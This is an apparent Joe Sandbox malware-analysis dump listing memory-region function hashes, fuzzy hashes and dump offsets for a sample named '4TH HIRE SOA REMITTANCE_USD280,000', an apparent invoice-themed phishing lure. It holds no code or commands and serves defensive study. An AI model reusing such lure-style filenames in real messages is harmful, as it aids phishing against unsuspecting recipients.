                                            • Instruction Fuzzy Hash: CB11E8B1A0020D9BCB04DFA9D585AAEBBF8FF58350F10806AA905E7355D674EA018BA4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28bbe8ca1572f998005f5067e8b42f4ce9b1a58724ee40e4d4be7cd44b7d82d3
                                            • Instruction ID: d5a7fe041b99e44ff314de3f66df1b7974ca1e44a3bd83eae6923668f4032c38
                                            • Opcode Fuzzy Hash: 28bbe8ca1572f998005f5067e8b42f4ce9b1a58724ee40e4d4be7cd44b7d82d3
                                            • Instruction Fuzzy Hash: 9C01B1315402119FC732BE19C44492AFBA9FFE1760B58846AE6859B651DB20DE42CBD1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction ID: 2f84406f5b71fa4375a9f20a3ffd80c3efb04dbd7e8aa553371f4bf7ce924e61
                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction Fuzzy Hash: 2401B5321007059FEB33AAAAC844EA7F7E9FFC9754F14441DAA56CB540EE70E542CB60
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60c3c38e2ed34fd91f0215c76b63a46cb4cb05eac09d564419bdf6630018904e
                                            • Instruction ID: 37e65760dd1e9a32d4e22794f95ac22c2cee02d92eaa1245b63690779773b609
                                            • Opcode Fuzzy Hash: 60c3c38e2ed34fd91f0215c76b63a46cb4cb05eac09d564419bdf6630018904e
                                            • Instruction Fuzzy Hash: FC118075A0120DEFCB05DFA8C854FAEBBB5FF44350F008099F90697294E635AE12CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b3641a43f59154ed30b25b8bc99333a11ec2881dc4b2817336a822b2d051f0aa
                                            • Instruction ID: c50e1c7b5ef613ee3d4451c734b1f372fb013f83cbd96d904965d7d384ffb3eb
                                            • Opcode Fuzzy Hash: b3641a43f59154ed30b25b8bc99333a11ec2881dc4b2817336a822b2d051f0aa
                                            • Instruction Fuzzy Hash: FB01FD71280705AFD3367F19D940F06BAA8EF94F60F14482AB706EF394D6B0DA418BA4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76cd4b0de98dc22d808e7cd1fd807bff8afa02fd0a7263add3418b91fd43068c
                                            • Instruction ID: 1cd0ef3578e4cb74b3160a458f4ed9e00c0091525a05febb7f9af8aec3a5074f
                                            • Opcode Fuzzy Hash: 76cd4b0de98dc22d808e7cd1fd807bff8afa02fd0a7263add3418b91fd43068c
                                            • Instruction Fuzzy Hash: 4AF0F432A41A10BBCB31DF5A9C44F07FEAAEBC8B90F104068E61597640CA30ED05CBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction ID: a600319346287017668d07f009148fed5b162fcfee3a083a4b896291b9ef8cc6
                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction Fuzzy Hash: E7F0C2B2600615ABD325CF4DDC40F97FBEADBD5A80F048128A605CB220EA31DD04CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction ID: de8e49f7b22ef1b0aefbede789abb895d1355fb31cf41897a8bee83153900f11
                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction Fuzzy Hash: 99F0FC73284623ABD73336598C44BABFA958FE5A64F1A0035E305DB644C9608D0396F2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e82a08710e21e2a35f29d27fed6ee1fcf95a26ccdc11ff818129a77e7126033
                                            • Instruction ID: 8960bf3fb512420b0b643f1c6be48d0e0c12e1e93d48264ff1b353d92f42b6a1
                                            • Opcode Fuzzy Hash: 8e82a08710e21e2a35f29d27fed6ee1fcf95a26ccdc11ff818129a77e7126033
                                            • Instruction Fuzzy Hash: D5014FB1A1024DEFDB04DFA9D955AAEF7F8FF98304F10406AF905E7350E6749A018BA4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcde3a6c1f4d757bc3ebe5cc5a42ba2cd91565da86b274f371346c6e2c033c6f
                                            • Instruction ID: 040fe746322c943aafc9e9bff2922a2a4ca0cd65e3289a2b1bc9d22d4949205f
                                            • Opcode Fuzzy Hash: bcde3a6c1f4d757bc3ebe5cc5a42ba2cd91565da86b274f371346c6e2c033c6f
                                            • Instruction Fuzzy Hash: F6012CB1A0024DEBDB04DFA9D545AAEBBF8EF58304F50806AE915E7390D6749A018BA4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8e9c23736594485f3ebaf30d445c1e2693769235448b286355597435693ff10
                                            • Instruction ID: 9ce0f69431852f1e483b57f9dc61f55dda5e7981919ed856a151a9eba57fbea7
                                            • Opcode Fuzzy Hash: e8e9c23736594485f3ebaf30d445c1e2693769235448b286355597435693ff10
                                            • Instruction Fuzzy Hash: B6012171A1024DEBCB04DFA9D4559AEB7F8EF58304F10406AF905E7351D6749A018BA4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction ID: 4b116f53988232bd02d21555b4e5f2543656798012a81436531a613d9ae46a42
                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction Fuzzy Hash: 0D01F932600A89EBD323975DCC49F59FB98EF52B54F0940A9FA48DB6A1D674CA80C251
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8379221d6d3d05c79ee7f2d0225fd4d06b65db3c7277096e1e1fca4e8b309938
                                            • Instruction ID: 7f81c39282cebbe85e9722d01010e1fb8c17d334099f55fd5599604baa861502
                                            • Opcode Fuzzy Hash: 8379221d6d3d05c79ee7f2d0225fd4d06b65db3c7277096e1e1fca4e8b309938
                                            • Instruction Fuzzy Hash: A1012C71A0024D9BDB04DFA9D445AAEBBF8AF58314F14405AE505E7390E774AA01CB95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction ID: 26f4e957b4637aff917b692d549a2fcd1ff4ee081be55779a5ab90610c41ffe9
                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction Fuzzy Hash: 79F0F97220001DBFEF019F94DD80DAFBB7EFB59298B104125BA11A2160D671DE21ABA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbd668b1534f52bfd6a604ece3572adaa25e3caebab44a33ec31bd52440b725f
                                            • Instruction ID: ee042a61eab4e241fe0c907e643e3d23abb125331285aa79f9cb16e7f5537b29
                                            • Opcode Fuzzy Hash: dbd668b1534f52bfd6a604ece3572adaa25e3caebab44a33ec31bd52440b725f
                                            • Instruction Fuzzy Hash: 00018936105149EBCF129E88D840EDE7F6AFB4C754F058102FE19A6224C336DA70EF81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 36ab3f2414f1e321b583fc676309d2b81d8375db3666369a3bffb7f9c8330b29
                                            • Instruction ID: 2c3caf2b4065f82d39193e3612a80ee2461926c8a44944a1151cf0ad1ec365ec
                                            • Opcode Fuzzy Hash: 36ab3f2414f1e321b583fc676309d2b81d8375db3666369a3bffb7f9c8330b29
                                            • Instruction Fuzzy Hash: 20F02BB1A842415BF716B5199C41BA2F29AE7D4794F2580BAEB058B6C2E970DC0183B4
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68f246f08d9ee218261fccd9b87abf6916136c7005d73b0e82e8cced420279d2
                                            • Instruction ID: 6442749ff1d223e11a369b238cf07879e82bae28542bf51b33f12590b308ab64
                                            • Opcode Fuzzy Hash: 68f246f08d9ee218261fccd9b87abf6916136c7005d73b0e82e8cced420279d2
                                            • Instruction Fuzzy Hash: 3401A970240685DBE3339B6CDD48F25B7A4BB54F04F650198BA01DB6DAE768D5418610
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction ID: 3a9eb055e0dd2ad5a5d43292500576f01153c9dd805e4feaad5852fe22b6b4b1
                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction Fuzzy Hash: 62F0E231385E1347EB36AA2E8820F2BEA95AFE0F40B0D062C9601CB684DF60DD0087C0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1fd5874c1d17f6cf870a098d631191ec6aa84708e04d8293f866e452aab7db7
                                            • Instruction ID: f606a1ee1ec4ffaaa444ef729f6ca27ae812b91b8072abd44d87744fa132aca5
                                            • Opcode Fuzzy Hash: e1fd5874c1d17f6cf870a098d631191ec6aa84708e04d8293f866e452aab7db7
                                            • Instruction Fuzzy Hash: 14F0AF716153089FC310EF68C445E1AF7E4FF98714F40465ABC98DB398E634EA00CB96
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction ID: 257201303bfdbf33c13fa5cff2637478325bcc9c4ff042946d4d9763f1d11070
                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction Fuzzy Hash: 5EF09033A105119BD3328B4DCC80F12B76DABD5B60F590124AE04DB268C260ED018790
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction ID: 59d57e4e51d38ac5cc567f5703923cda73c7076f294004c0b101122d2ea06d58
                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction Fuzzy Hash: 25F09072650204EEE714DB25CC05F57B6E9EF98740F14C06CA645D7164FAB0DD11D694
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b82b49f8a5cac7c3c0d2ffd5b7755ffa4b9ce3894e8de9a97ba0a391bd806b24
                                            • Instruction ID: c279135f372c97a15473cbe56fdaf3740f24e5b55f0e64bf8f324cad3c4fde37
                                            • Opcode Fuzzy Hash: b82b49f8a5cac7c3c0d2ffd5b7755ffa4b9ce3894e8de9a97ba0a391bd806b24
                                            • Instruction Fuzzy Hash: 86F04F71A0124DDFCB04EFA9C515A6EB7B5EF58304F008066A956EB399DA38EB01CB94
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f04f332223fc5024518d5d1861c30630202ed047b96f6b5fdc52632af5cbccb5
                                            • Instruction ID: 19efc13ac017791c7e980b02065cb6ef44996bf834755995362f3d0794a0410b
                                            • Opcode Fuzzy Hash: f04f332223fc5024518d5d1861c30630202ed047b96f6b5fdc52632af5cbccb5
                                            • Instruction Fuzzy Hash: 74F0B4319966D19FEF32CB5CE644F21FBD89B00630F084DAAD54B8F502D724D88AC651
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33ad5de3bc031ea2e82961f7a8c069c632fd1df4fa908b6e7d39dea0d19f7804
                                            • Instruction ID: bc91baac3b3c4f42400388acb36ac3e72bdde0c8a3bfac99ea232572b0306f37
                                            • Opcode Fuzzy Hash: 33ad5de3bc031ea2e82961f7a8c069c632fd1df4fa908b6e7d39dea0d19f7804
                                            • Instruction Fuzzy Hash: 7390023160940802D25071584418746408597D4301F55C021A0024664DC7558B5577A2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41ccf24e82fa0beee39b246d923e6e7d783156928936d91acede079c324d45dd
                                            • Instruction ID: e05db955cbaf91eda950603c0a8a050315bf7ece560aa7fecb5c09e223b696f2
                                            • Opcode Fuzzy Hash: 41ccf24e82fa0beee39b246d923e6e7d783156928936d91acede079c324d45dd
                                            • Instruction Fuzzy Hash: 0990023120540802D20471584808686408597D4301F55C021A6024665ED6658A917232
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d73f76dfb5c411158446ac3b59fa250def5af26fffa6715134aa757f3634c4b0
                                            • Instruction ID: 9f77324c903f0851a8cac9d7ec8af16986eca3753e986f606b41b1549eecfaa5
                                            • Opcode Fuzzy Hash: d73f76dfb5c411158446ac3b59fa250def5af26fffa6715134aa757f3634c4b0
                                            • Instruction Fuzzy Hash: D1900225225400020245B558060850B44C5A7DA351395C025F14165A0CC6218A655322
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23657aeaaaefa3a910c833e878ece309efd91b7bb2b86c25b1b92d5c6668aa43
                                            • Instruction ID: 869d000c2d668de7b56b1bee92c559f2ae764500a42d4dc7784f48e4059602cb
                                            • Opcode Fuzzy Hash: 23657aeaaaefa3a910c833e878ece309efd91b7bb2b86c25b1b92d5c6668aa43
                                            • Instruction Fuzzy Hash: 74900225215400030205B558070850740C697D9351355C031F1015560CD6218A615222
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fb5b94d00ad17295ab64fd58bc3bc00172209cb4dd5b39edff6c3c362e9993d
                                            • Instruction ID: 426603ed9973e8ec9342f27f3b16faccf9e21898071f38c4839e0a32d4e42fdd
                                            • Opcode Fuzzy Hash: 3fb5b94d00ad17295ab64fd58bc3bc00172209cb4dd5b39edff6c3c362e9993d
                                            • Instruction Fuzzy Hash: 849002A1205540924600B2588408B0A858597E4201B55C026E1054570CC5258A519236
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5741c5c590ef2f9a16c81211f9cb41477da08b6c8c8ffc35f143432f55d4ab3
                                            • Instruction ID: fbcffc95a3f433aa82473b2ddd21384da0b6485c402321b8f297c4b539843c4b
                                            • Opcode Fuzzy Hash: b5741c5c590ef2f9a16c81211f9cb41477da08b6c8c8ffc35f143432f55d4ab3
                                            • Instruction Fuzzy Hash: 2F90022130540003D2407158541C6068085E7E5301F55D021E0414564CD9158A565323
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e83f2a880417a1eabe67c82f041705548da21640ffcf3969e4453321dfc8a677
                                            • Instruction ID: 97d6b5659a51c2decc86c58ea537eab2be7381e40e3f35f53e47e3968a05b173
                                            • Opcode Fuzzy Hash: e83f2a880417a1eabe67c82f041705548da21640ffcf3969e4453321dfc8a677
                                            • Instruction Fuzzy Hash: BC90022921740002D2807158540C60A408597D5202F95D425A0015568CC9158A695322
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 706608f870cec20de9b1b6df40b4badd736e10ac857bc94ce1b761ab41c42072
                                            • Instruction ID: d028a28351a46f83ea58a6c7ec49016172f977682551d770a175aeba216136f9
                                            • Opcode Fuzzy Hash: 706608f870cec20de9b1b6df40b4badd736e10ac857bc94ce1b761ab41c42072
                                            • Instruction Fuzzy Hash: 0690022120944442D2007558540CA06408597D4205F55D021A10645A5DC6358A51A232
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1a10a496eb45eef5afb8e2de5a87040d0a78986a90f84604e5ca4acdd614742
                                            • Instruction ID: 67e6e2730929e84ca6a10226d019ee4ddd34cc711b058780539a7d29d1c5c9c5
                                            • Opcode Fuzzy Hash: d1a10a496eb45eef5afb8e2de5a87040d0a78986a90f84604e5ca4acdd614742
                                            • Instruction Fuzzy Hash: DB900221246441525645B15844085078086A7E4241795C022A1414960CC5269A56D722
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7cbbc28c37393d20e621861c67ace351d484de20546c2c0370633c31f1605c3
                                            • Instruction ID: b6e072e98b29ca4466925653e904ae6e1dc308443d75f1951998d0eed00dbeb0
                                            • Opcode Fuzzy Hash: b7cbbc28c37393d20e621861c67ace351d484de20546c2c0370633c31f1605c3
                                            • Instruction Fuzzy Hash: 4A90023124540402D241715844086064089A7D4241F95C022A0424564EC6558B56AB62
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46dab9e1e625fc6581ffd748eaa64593d2383a20df5aa70eaeb1179c571a09c0
                                            • Instruction ID: 954efc43824f0dc29ed740db4e604cf42818f5fa1b1dc2bfeccb345b4792a0cf
                                            • Opcode Fuzzy Hash: 46dab9e1e625fc6581ffd748eaa64593d2383a20df5aa70eaeb1179c571a09c0
                                            • Instruction Fuzzy Hash: E790023120540842D20071584408B46408597E4301F55C026A0124664DC615CA517622
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b31b39ba51923deac019e1c3430b07e72af467f8c2d7da25626c4315e09e4730
                                            • Instruction ID: 4efac78bfeb81cff29262c765866f3ef317ccc650d731e30c1f573c21cbb502d
                                            • Opcode Fuzzy Hash: b31b39ba51923deac019e1c3430b07e72af467f8c2d7da25626c4315e09e4730
                                            • Instruction Fuzzy Hash: 6090023120540403D2007158550C707408597D4201F55D421A0424568DD6568A516222
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f18fa466f2160da69fbb795634a1ad159c40aa3fc6c63d1a90313ce04378897
                                            • Instruction ID: 01d1f5b37b5e028860cfdba5afcfc23d8824ff82e50fe2997c738e8a2178abd6
                                            • Opcode Fuzzy Hash: 9f18fa466f2160da69fbb795634a1ad159c40aa3fc6c63d1a90313ce04378897
                                            • Instruction Fuzzy Hash: A590022160940402D2407158541C706409597D4201F55D021A0024564DC6598B5567A2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
